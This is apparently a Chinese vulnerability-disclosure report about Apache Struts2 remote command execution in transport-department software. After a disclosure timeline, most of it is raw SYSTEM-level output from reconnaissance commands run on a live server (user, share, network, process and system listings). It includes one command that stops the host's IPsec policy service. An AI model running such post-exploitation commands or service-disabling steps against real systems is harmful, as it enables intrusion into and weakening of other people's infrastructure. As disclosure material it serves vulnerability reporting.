2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
这个交通部开发的软件,应该是通用性的漏洞哦,呵呵…………虽然搞重定向,限制写入脚本等等,但没什么卵用!后门搞命令,呵呵
该IP存在多个系统,**.**.**.**:8090/xjyb/
其中链接地址**.**.**.**:8080/xjly/csoft/login.action存在Apache Struts2 XWork绕过安全限制执行任意命令漏洞、Apache Struts ‘ParameterInterceptor’ 安全绕过允许远程执行命令、Apache Struts 多个远程命令执行漏洞
whoamint authority\systemnet user\\ 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令运行完毕,但发生一个或多个错误。net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 G$ G:\ 默认共享 IPC$ 远程 IPC P$ P:\ 默认共享 ADMIN$ C:\Windows 远程管理 命令成功完成。net view服务器名称 注解-------------------------------------------------------------------------------\\CENTERAPP \\CITAPPSVR \\FJ-CZ2008SEVERS \\LONGJIANDA \\WIN-6F1C9BB8YBI \\WIN-8UNJQHK4CVN \\WIN-AV53231HP29 \\WINDOWS-CRR0LLA \\WINDOWS-EOA8QI0 \\WINDOWS-G46UVI1 \\WINDOWS-G4DJJHB \\WINDOWS-O8CT0IC \\WINDOWS-RDN3FTI \\WINDOWS-T1VQG9E \\WINDOWS-T2N30BJ \\XJYGJ-240AF0E51 \\XJYGJ-WEB2 \\YUNZHEN 命令成功完成。netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:7 **.**.**.**:0 LISTENING 2204 TCP **.**.**.**:9 **.**.**.**:0 LISTENING 2204 TCP **.**.**.**:13 **.**.**.**:0 LISTENING 2204 TCP **.**.**.**:17 **.**.**.**:0 LISTENING 2204 TCP **.**.**.**:19 **.**.**.**:0 LISTENING 2204 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 1008 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1158 **.**.**.**:0 LISTENING 3140 TCP **.**.**.**:1521 **.**.**.**:0 LISTENING 2052 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1328 TCP **.**.**.**:3938 **.**.**.**:0 LISTENING 3440 TCP **.**.**.**:5520 **.**.**.**:0 LISTENING 3140 TCP **.**.**.**:6688 **.**.**.**:0 LISTENING 4224 TCP **.**.**.**:6689 **.**.**.**:0 LISTENING 4224 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 7872 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 7872 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 692 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 1084 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 1156 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 776 TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 2168 TCP **.**.**.**:49168 **.**.**.**:0 LISTENING 2084 TCP **.**.**.**:49245 **.**.**.**:0 LISTENING 728 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49158 **.**.**.**:0 LISTENING 1580 TCP **.**.**.**:50690 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50694 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50695 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50699 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50700 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50704 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50706 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50710 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50711 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50715 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50716 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50720 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50721 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50726 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50727 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50731 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50732 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50734 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50738 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50743 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50744 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50748 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50749 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:1521 **.**.**.**:50427 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:50577 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:50666 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:50667 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:50668 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:50735 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:53642 ESTABLISHED 2052 TCP **.**.**.**:1521 **.**.**.**:64718 ESTABLISHED 2052 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 7872 TCP **.**.**.**:10000 **.**.**.**:0 LISTENING 3440 TCP **.**.**.**:49162 **.**.**.**:0 LISTENING 2052 TCP **.**.**.**:49188 **.**.**.**:49189 ESTABLISHED 3140 TCP **.**.**.**:49189 **.**.**.**:49188 ESTABLISHED 3140 TCP **.**.**.**:50344 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:50427 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:50577 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:50666 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:50667 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:50668 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:50735 **.**.**.**:1521 ESTABLISHED 7872 TCP **.**.**.**:53642 **.**.**.**:1521 ESTABLISHED 4224 TCP **.**.**.**:64718 **.**.**.**:1521 ESTABLISHED 4592 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:8080 **.**.**.**:30673 ESTABLISHED 7872 TCP **.**.**.**:49158 **.**.**.**:0 LISTENING 1580 TCP **.**.**.**:55435 **.**.**.**:80 ESTABLISHED 4408 TCP **.**.**.**:65350 **.**.**.**:80 ESTABLISHED 5224 TCP [::]:7 [::]:0 LISTENING 2204 TCP [::]:9 [::]:0 LISTENING 2204 TCP [::]:13 [::]:0 LISTENING 2204 TCP [::]:17 [::]:0 LISTENING 2204 TCP [::]:19 [::]:0 LISTENING 2204 TCP [::]:135 [::]:0 LISTENING 1008 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1521 [::]:0 LISTENING 2052 TCP [::]:3389 [::]:0 LISTENING 1328 TCP [::]:3938 [::]:0 LISTENING 3440 TCP [::]:5520 [::]:0 LISTENING 3140 TCP [::]:8009 [::]:0 LISTENING 7872 TCP [::]:8080 [::]:0 LISTENING 7872 TCP [::]:49152 [::]:0 LISTENING 692 TCP [::]:49153 [::]:0 LISTENING 1084 TCP [::]:49154 [::]:0 LISTENING 1156 TCP [::]:49155 [::]:0 LISTENING 776 TCP [::]:49156 [::]:0 LISTENING 2168 TCP [::]:49168 [::]:0 LISTENING 2084 TCP [::]:49245 [::]:0 LISTENING 728 TCP [fe80::8854:4aaf:7bef:ae90%12]:1521 [fe80::8854:4aaf:7bef:ae90%12]:49167 ESTABLISHED 2052 TCP [fe80::8854:4aaf:7bef:ae90%12]:49158 [::]:0 LISTENING 1580 TCP [fe80::8854:4aaf:7bef:ae90%12]:49167 [fe80::8854:4aaf:7bef:ae90%12]:1521 ESTABLISHED 2084 TCP [fe80::ed24:6fcf:1bf3:8dde%10]:49158 [::]:0 LISTENING 1580 UDP **.**.**.**:7 *:* 2204 UDP **.**.**.**:9 *:* 2204 UDP **.**.**.**:13 *:* 2204 UDP **.**.**.**:17 *:* 2204 UDP **.**.**.**:19 *:* 2204 UDP **.**.**.**:123 *:* 1232 UDP **.**.**.**:500 *:* 1156 UDP **.**.**.**:3600 *:* 5376 UDP **.**.**.**:4500 *:* 1156 UDP **.**.**.**:49472 *:* 5376 UDP **.**.**.**:49473 *:* 5376 UDP **.**.**.**:49554 *:* 5376 UDP **.**.**.**:49555 *:* 5376 UDP **.**.**.**:49851 *:* 5376 UDP **.**.**.**:49852 *:* 5376 UDP **.**.**.**:50085 *:* 5048 UDP **.**.**.**:50101 *:* 5376 UDP **.**.**.**:50102 *:* 5376 UDP **.**.**.**:50526 *:* 5376 UDP **.**.**.**:50527 *:* 5376 UDP **.**.**.**:50779 *:* 5376 UDP **.**.**.**:50780 *:* 5376 UDP **.**.**.**:50836 *:* 5048 UDP **.**.**.**:50976 *:* 5376 UDP **.**.**.**:50977 *:* 5376 UDP **.**.**.**:51126 *:* 5376 UDP **.**.**.**:51127 *:* 5376 UDP **.**.**.**:51391 *:* 5376 UDP **.**.**.**:51392 *:* 5376 UDP **.**.**.**:51516 *:* 5376 UDP **.**.**.**:51517 *:* 5376 UDP **.**.**.**:51755 *:* 5376 UDP **.**.**.**:51756 *:* 5376 UDP **.**.**.**:52276 *:* 5376 UDP **.**.**.**:52277 *:* 5376 UDP **.**.**.**:52485 *:* 5376 UDP **.**.**.**:52486 *:* 5376 UDP **.**.**.**:52653 *:* 5376 UDP **.**.**.**:52654 *:* 5376 UDP **.**.**.**:52677 *:* 5376 UDP **.**.**.**:52678 *:* 5376 UDP **.**.**.**:52680 *:* 5376 UDP **.**.**.**:52681 *:* 5376 UDP **.**.**.**:52744 *:* 5376 UDP **.**.**.**:52745 *:* 5376 UDP **.**.**.**:52787 *:* 5376 UDP **.**.**.**:52788 *:* 5376 UDP **.**.**.**:52912 *:* 5376 UDP **.**.**.**:52913 *:* 5376 UDP **.**.**.**:53153 *:* 5376 UDP **.**.**.**:53154 *:* 5376 UDP **.**.**.**:53231 *:* 5376 UDP **.**.**.**:53232 *:* 5376 UDP **.**.**.**:53257 *:* 5376 UDP **.**.**.**:53258 *:* 5376 UDP **.**.**.**:53362 *:* 5376 UDP **.**.**.**:53363 *:* 5376 UDP **.**.**.**:54306 *:* 5376 UDP **.**.**.**:54430 *:* 5376 UDP **.**.**.**:54431 *:* 5376 UDP **.**.**.**:54435 *:* 5376 UDP **.**.**.**:54436 *:* 5376 UDP **.**.**.**:54541 *:* 5376 UDP **.**.**.**:54542 *:* 5376 UDP **.**.**.**:54612 *:* 5376 UDP **.**.**.**:54613 *:* 5376 UDP **.**.**.**:54933 *:* 5376 UDP **.**.**.**:54934 *:* 5376 UDP **.**.**.**:55062 *:* 5376 UDP **.**.**.**:55063 *:* 5376 UDP **.**.**.**:55220 *:* 5376 UDP **.**.**.**:55221 *:* 5376 UDP **.**.**.**:55286 *:* 5376 UDP **.**.**.**:55287 *:* 5376 UDP **.**.**.**:55289 *:* 5376 UDP **.**.**.**:55290 *:* 5376 UDP **.**.**.**:55627 *:* 5376 UDP **.**.**.**:55628 *:* 5376 UDP **.**.**.**:55784 *:* 5376 UDP **.**.**.**:55785 *:* 5376 UDP **.**.**.**:55871 *:* 5376 UDP **.**.**.**:55872 *:* 5376 UDP **.**.**.**:56020 *:* 5376 UDP **.**.**.**:56021 *:* 5376 UDP **.**.**.**:56154 *:* 5376 UDP **.**.**.**:56155 *:* 5376 UDP **.**.**.**:56258 *:* 5376 UDP **.**.**.**:56259 *:* 5376 UDP **.**.**.**:56631 *:* 5376 UDP **.**.**.**:56632 *:* 5376 UDP **.**.**.**:56711 *:* 5376 UDP **.**.**.**:56712 *:* 5376 UDP **.**.**.**:56809 *:* 5376 UDP **.**.**.**:56810 *:* 5376 UDP **.**.**.**:56835 *:* 5048 UDP **.**.**.**:56852 *:* 5376 UDP **.**.**.**:56853 *:* 5376 UDP **.**.**.**:56915 *:* 5376 UDP **.**.**.**:56916 *:* 5376 UDP **.**.**.**:56961 *:* 5048 UDP **.**.**.**:56962 *:* 5048 UDP **.**.**.**:56988 *:* 5376 UDP **.**.**.**:56989 *:* 5376 UDP **.**.**.**:57021 *:* 5376 UDP **.**.**.**:57022 *:* 5376 UDP **.**.**.**:57224 *:* 5376 UDP **.**.**.**:57225 *:* 5376 UDP **.**.**.**:57318 *:* 5376 UDP **.**.**.**:57319 *:* 5376 UDP **.**.**.**:57356 *:* 5376 UDP **.**.**.**:57357 *:* 5376 UDP **.**.**.**:57534 *:* 5376 UDP **.**.**.**:57535 *:* 5376 UDP **.**.**.**:57716 *:* 5376 UDP **.**.**.**:57717 *:* 5376 UDP **.**.**.**:58111 *:* 5376 UDP **.**.**.**:58112 *:* 5376 UDP **.**.**.**:58274 *:* 5376 UDP **.**.**.**:58275 *:* 5376 UDP **.**.**.**:58394 *:* 5376 UDP **.**.**.**:58395 *:* 5376 UDP **.**.**.**:58429 *:* 5376 UDP **.**.**.**:58430 *:* 5376 UDP **.**.**.**:58431 *:* 5376 UDP **.**.**.**:58432 *:* 5376 UDP **.**.**.**:58443 *:* 5376 UDP **.**.**.**:58444 *:* 5376 UDP **.**.**.**:58445 *:* 5376 UDP **.**.**.**:58446 *:* 5376 UDP **.**.**.**:58478 *:* 5376 UDP **.**.**.**:58479 *:* 5376 UDP **.**.**.**:58489 *:* 5376 UDP **.**.**.**:58490 *:* 5376 UDP **.**.**.**:58514 *:* 5376 UDP **.**.**.**:58515 *:* 5376 UDP **.**.**.**:58626 *:* 5048 UDP **.**.**.**:58628 *:* 5048 UDP **.**.**.**:58892 *:* 5048 UDP **.**.**.**:58893 *:* 5048 UDP **.**.**.**:59247 *:* 5376 UDP **.**.**.**:59248 *:* 5376 UDP **.**.**.**:59633 *:* 5376 UDP **.**.**.**:59634 *:* 5376 UDP **.**.**.**:59973 *:* 5376 UDP **.**.**.**:59974 *:* 5376 UDP **.**.**.**:60192 *:* 5376 UDP **.**.**.**:60193 *:* 5376 UDP **.**.**.**:60293 *:* 5376 UDP **.**.**.**:60294 *:* 5376 UDP **.**.**.**:60317 *:* 5376 UDP **.**.**.**:60318 *:* 5376 UDP **.**.**.**:60546 *:* 5376 UDP **.**.**.**:60547 *:* 5376 UDP **.**.**.**:60799 *:* 5376 UDP **.**.**.**:60800 *:* 5376 UDP **.**.**.**:60998 *:* 5376 UDP **.**.**.**:60999 *:* 5376 UDP **.**.**.**:61109 *:* 5376 UDP **.**.**.**:61110 *:* 5376 UDP **.**.**.**:61325 *:* 5376 UDP **.**.**.**:61326 *:* 5376 UDP **.**.**.**:61619 *:* 5376 UDP **.**.**.**:61620 *:* 5376 UDP **.**.**.**:61832 *:* 5376 UDP **.**.**.**:61833 *:* 5376 UDP **.**.**.**:62088 *:* 5376 UDP **.**.**.**:62089 *:* 5376 UDP **.**.**.**:62094 *:* 5376 UDP **.**.**.**:62095 *:* 5376 UDP **.**.**.**:62108 *:* 5376 UDP **.**.**.**:62109 *:* 5376 UDP **.**.**.**:62225 *:* 5376 UDP **.**.**.**:62226 *:* 5376 UDP **.**.**.**:62357 *:* 5376 UDP **.**.**.**:62358 *:* 5376 UDP **.**.**.**:62363 *:* 5376 UDP **.**.**.**:62364 *:* 5376 UDP **.**.**.**:62435 *:* 5376 UDP **.**.**.**:62436 *:* 5376 UDP **.**.**.**:62585 *:* 5376 UDP **.**.**.**:62586 *:* 5376 UDP **.**.**.**:62613 *:* 5376 UDP **.**.**.**:62614 *:* 5376 UDP **.**.**.**:62798 *:* 5376 UDP **.**.**.**:62799 *:* 5376 UDP **.**.**.**:62935 *:* 5376 UDP **.**.**.**:62936 *:* 5376 UDP **.**.**.**:63174 *:* 5376 UDP **.**.**.**:63175 *:* 5376 UDP **.**.**.**:63218 *:* 5376 UDP **.**.**.**:63219 *:* 5376 UDP **.**.**.**:63921 *:* 5376 UDP **.**.**.**:63922 *:* 5376 UDP **.**.**.**:64028 *:* 5376 UDP **.**.**.**:64029 *:* 5376 UDP **.**.**.**:64096 *:* 5376 UDP **.**.**.**:64097 *:* 5376 UDP **.**.**.**:64263 *:* 5376 UDP **.**.**.**:64264 *:* 5376 UDP **.**.**.**:64446 *:* 5376 UDP **.**.**.**:64447 *:* 5376 UDP **.**.**.**:64513 *:* 5376 UDP **.**.**.**:64514 *:* 5376 UDP **.**.**.**:64539 *:* 5376 UDP **.**.**.**:64540 *:* 5376 UDP **.**.**.**:64577 *:* 5376 UDP **.**.**.**:64578 *:* 5376 UDP **.**.**.**:64630 *:* 5376 UDP **.**.**.**:64631 *:* 5376 UDP **.**.**.**:64760 *:* 5376 UDP **.**.**.**:64761 *:* 5376 UDP **.**.**.**:64773 *:* 5376 UDP **.**.**.**:64774 *:* 5376 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:52986 *:* 5376 UDP **.**.**.**:64559 *:* 2308 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:7 *:* 2204 UDP [::]:9 *:* 2204 UDP [::]:13 *:* 2204 UDP [::]:17 *:* 2204 UDP [::]:19 *:* 2204 UDP [::]:123 *:* 1232 UDP [::]:500 *:* 1156 UDP [fe80::8854:4aaf:7bef:ae90%12]:546 *:* 1084net start已经启动以下 Windows 服务: Apache Tomcat 6 Application Experience Application Management Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Diagnostic System Host Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Group Policy Client Human Interface Device Access IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent KtmRm for Distributed Transaction Coordinator Network Connections Network Location Awareness Network Store Interface Service Oracle YZMISEX VSS Writer Service OracleDBConsoleyzmisex OracleJobSchedulerYZMISEX OracleMTSRecoveryService OracleOraDb11g_home1ClrAgent OracleOraDb11g_home1TNSListener OracleServiceYZMISEX Plug and Play Print Spooler Remote Access Connection Manager Remote Procedure Call (RPC) Remote Registry Secondary Logon Secure Socket Tunneling Protocol Service Security Accounts Manager Server Shell Hardware Detection Software Licensing System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper Telephony Terminal Services Terminal Services Configuration Terminal Services UserMode Port Redirector User Profile Service Windows Error Reporting Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Time Windows Update Workstation 主动防御 简单 TCP/IP 服务命令成功完成。ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WIN-6F1C9BB8YBI 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 4: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331FLR Adapter #4 物理地址. . . . . . . . . . . . . : AC-16-2D-8A-7D-93 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 3: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331FLR Adapter #3 物理地址. . . . . . . . . . . . . : AC-16-2D-8A-7D-92 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 2: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331FLR Adapter #2 物理地址. . . . . . . . . . . . . : AC-16-2D-8A-7D-91 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::8854:4aaf:7bef:ae90%12(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 279713325 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-18-D8-AB-B4-AC-16-2D-8A-7D-90 DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1 fec0:0:0:ffff::2%1 fec0:0:0:ffff::3%1 TCPIP 上的 NetBIOS . . . . . . . : 已启用以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331FLR Adapter 物理地址. . . . . . . . . . . . . : AC-16-2D-8A-7D-90 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::ed24:6fcf:1bf3:8dde%10(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 229381677 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-18-D8-AB-B4-AC-16-2D-8A-7D-90 DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 本地连接* 8: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{9DBA8E55-91E7-4ED1-BE42-CE42FD35C0C4} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 9: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{6347B3A3-0DBA-4FDE-9A1A-CA1B745FE762} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 11: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{0C3618BC-B5D2-4706-A766-74F07E1C0A6E} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 12: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{10BFF003-C43A-45A6-A616-EB296BA0495D} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 13: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 02-00-54-55-4E-01 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是arp -a接口: **.**.**.** --- 0xa Internet 地址 物理地址 类型 **.**.**.** 3c-e5-a6-54-f4-03 动态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 **.**.**.** 01-00-5e-00-00-fc 静态 接口: **.**.**.** --- 0xc Internet 地址 物理地址 类型 **.**.**.** 00-1e-0b-6c-e2-10 动态 **.**.**.** 00-e0-4c-0f-ed-60 动态 **.**.**.** 00-1c-c4-6d-66-7c 动态 **.**.**.** 68-f7-28-46-2f-7c 动态 **.**.**.** 00-1e-0b-d3-da-a2 动态 **.**.**.** 34-17-eb-99-35-5c 动态 **.**.**.** 34-17-eb-99-35-5c 动态 **.**.**.** f0-bf-97-1d-69-2b 动态 **.**.**.**5 ff-ff-ff-ff-ff-ff 静态 **.**.**.** 01-00-5e-00-00-fc 静态 tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 572 暂缺 csrss.exe 640 暂缺 csrss.exe 684 暂缺 wininit.exe 692 暂缺 services.exe 728 暂缺 winlogon.exe 752 暂缺 lsass.exe 776 SamSs lsm.exe 784 暂缺 svchost.exe 948 DcomLaunch, PlugPlay svchost.exe 1008 RpcSs svchost.exe 1084 Dhcp, EventLog, lmhosts LogonUI.exe 1100 暂缺 svchost.exe 1136 gpsvc svchost.exe 1156 AeLookupSvc, AppMgmt, BITS, CertPropSvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, RasMan, Schedule, seclogon, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv SLsvc.exe 1180 slsvc svchost.exe 1232 EventSystem, LanmanWorkstation, nsi, SstpSvc, W32Time svchost.exe 1284 hidserv, Netman, TrkWks, UmRdpService, UxSms, WdiSystemHost svchost.exe 1328 CryptSvc, Dnscache, KtmRm, NlaSvc, TermService, WinRM ZhuDongFangYu.exe 1392 ZhuDongFangYu svchost.exe 1544 BFE, DPS, MpsSvc spoolsv.exe 352 Spooler nmesrvc.exe 596 OracleDBConsoleyzmisex extjob.exe 632 OracleJobSchedulerYZMISEX omtsreco.exe 1580 OracleMTSRecoveryService OraClrAgnt.exe 676 OracleOraDb11g_home1ClrAgent TNSLSNR.EXE 2052 OracleOraDb11g_home1TNSListener oracle.exe 2084 OracleServiceYZMISEX oravssw.exe 2144 OracleVssWriterYZMISEX svchost.exe 2168 PolicyAgent svchost.exe 2180 RemoteRegistry TCPSVCS.EXE 2204 simptcp svchost.exe 2292 WerSvc cmd.exe 3028 暂缺 perl.exe 3044 暂缺 cmd.exe 3124 暂缺 java.exe 3140 暂缺 msdtc.exe 3888 MSDTC csrss.exe 4648 暂缺 winlogon.exe 4692 暂缺 taskeng.exe 4816 暂缺 rdpclip.exe 4880 暂缺 explorer.exe 5036 暂缺 360rp.exe 5048 暂缺 360sd.exe 5060 暂缺 jusched.exe 5224 暂缺 CSSvrMgr.exe 5256 暂缺 360tray.exe 5376 暂缺 svchost.exe 5840 TapiSrv wercon.exe 4388 暂缺 conime.exe 924 暂缺 CSFrame.exe 5624 暂缺 tomcat6.exe 7872 Tomcat6 SogouCloud.exe 5296 暂缺 CSFrame.exe 6852 暂缺 jucheck.exe 4408 暂缺 emagent.exe 3440 暂缺 dwm.exe 8072 暂缺 javaw.exe 2308 暂缺 wlrmdr.exe 4048 暂缺 CSServer.exe 4224 暂缺 sqldeveloperW.exe 4592 暂缺 taskeng.exe 6824 暂缺 tasklist.exe 6880 暂缺 WmiPrvSE.exe 7716 暂缺 systeminfo主机名: WIN-6F1C9BB8YBIOS 名称: Microsoft? Windows Server? 2008 Enterprise OS 版本: 6.0.6002 Service Pack 2 Build 6002OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 92516-OEM-7502905-10173初始安装日期: 2013/3/18, 18:24:42系统启动时间: 2015/7/31, 8:36:56系统制造商: HP系统型号: ProLiant DL380p Gen8系统类型: X86-based PC处理器: 安装了 2 个处理器。 [01]: x64 Family 6 Model 45 Stepping 7 GenuineIntel ~1995 Mhz [02]: x64 Family 6 Model 45 Stepping 7 GenuineIntel ~1995 MhzBIOS 版本: HP P70, 2012/12/14Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 65,501 MB可用的物理内存: 60,724 MB页面文件: 最大值: 131,141 MB页面文件: 可用: 126,256 MB页面文件: 使用中: 4,885 MB页面文件位置: D:\pagefile.sys域: WORKGROUP登录服务器: 暂缺修补程序: 安装了 7 个修补程序。 [01]: {200CF746-8868-41DB-849D-5B738B720D8C} [02]: {3339588D-B14A-4203-B2DB-D01A6E80075C} [03]: {7C86E295-0E30-4756-87B9-30C614C0DAA9} [04]: {F5E7ECC3-52DC-4CA7-A6E1-1A48B6ABE793} [05]: {FF8CA1E1-CD49-4012-B4FE-53D47AF05FA6} [06]: {225CBA3B-11CC-499D-9F06-4A245B877AD2} [07]: KB955430网卡: 安装了 4 个 NIC。 [01]: HP Ethernet 1Gb 4-port 331FLR Adapter 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::ed24:6fcf:1bf3:8dde [02]: HP Ethernet 1Gb 4-port 331FLR Adapter 连接名: 本地连接 2 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::8854:4aaf:7bef:ae90 [03]: HP Ethernet 1Gb 4-port 331FLR Adapter 连接名: 本地连接 3 状态: 媒体连接已中断 [04]: HP Ethernet 1Gb 4-port 331FLR Adapter 连接名: 本地连接 4 状态: 媒体连接已中断net stop policyagentIPsec Policy Agent 服务正在停止.IPsec Policy Agent 服务已成功停止。tracert **.**.**.**通过最多 30 个跃点跟踪到 WIN-6F1C9BB8YBI [**.**.**.**] 的路由: 1 <1 毫秒 <1 毫秒 <1 毫秒 WIN-6F1C9BB8YBI [**.**.**.**] 跟踪完成。net user 